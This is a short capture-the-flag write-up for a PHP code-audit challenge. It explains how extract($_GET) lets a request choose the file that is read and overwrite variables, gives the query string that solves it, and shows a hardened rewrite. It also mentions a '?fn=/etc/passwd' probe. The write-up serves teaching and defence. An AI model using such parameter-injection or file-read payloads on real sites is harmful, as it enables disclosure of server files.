WP-Bugku-web8

Challenge URL: http://120.24.86.145:8002/web8/

Opening the page shows the source code, so this is a code-audit task.

<?php
// Registers every GET parameter as a PHP variable, so ?fn=... and ?ac=... (or even ?flag=...) set $fn, $ac and $flag directly.
extract($_GET);
if (!empty($ac))
{
    // Reads the file whose name the user chose and strips surrounding whitespace.
    $f = trim(file_get_contents($fn));
    // Strict comparison: $ac must match the file contents exactly.
    if ($ac === $f)
    {
        echo "<p>This is flag:" ." $flag</p>";
    }
    else
    {
        echo "<p>sorry!</p>";
    }
}
?>

From the source, the flag is printed when ac is non-empty, f is read from the file named by fn, and ac is strictly identical (===) to f. Because extract($_GET) turns every query parameter into a variable, both fn and ac are fully under the requester's control.

Construct the payload (flag.txt on the server contains the string "flags"):
?ac=flags&fn=flag.txt

Response: This is flag: flag{3cfb7a90fc0de31}
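The root cause is extract($_GET): request parameters become local variables, so the caller picks which file is read and can even overwrite $flag. The following is an added example, not the challenge's code, showing the same check written defensively: parameters are read explicitly, the file path is fixed to an application-owned constant, the parameter type is validated, and the comparison is constant-time. The path CHECK_FILE and the FLAG environment variable are assumptions for the example.

```php
<?php
// Added example (not the challenge's own code): a hardened version of the
// same "compare the answer with a file" logic.
declare(strict_types=1);

// The application decides which file is read; the request never does.
const CHECK_FILE = __DIR__ . '/flag.txt';      // constructed path for this example
$flag = getenv('FLAG') ?: 'flag{placeholder}'; // placeholder, not a real flag

function readExpected(string $path): ?string
{
    // Refuse anything that is not a readable regular file.
    if (!is_file($path) || !is_readable($path)) {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : trim($data);
}

function checkAnswer(array $query, string $flag): string
{
    // Read the one parameter we need explicitly; no extract(), so $flag
    // and the file path cannot be overwritten from the query string.
    $ac = $query['ac'] ?? '';
    if (!is_string($ac) || $ac === '') {   // $_GET values may also be arrays
        return '<p>sorry!</p>';
    }
    $expected = readExpected(CHECK_FILE);
    if ($expected === null) {
        return '<p>sorry!</p>';
    }
    // Constant-time comparison; the page's === leaks nothing here either,
    // but hash_equals() is the idiomatic choice for secret comparison.
    if (hash_equals($expected, $ac)) {
        return '<p>This is flag: ' . htmlspecialchars($flag, ENT_QUOTES, 'UTF-8') . '</p>';
    }
    return '<p>sorry!</p>';
}

echo checkAnswer($_GET, $flag);
```

With this structure a request such as ?fn=/etc/passwd or ?flag=anything has no effect: fn is never consulted and $flag is set only from the server's environment.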
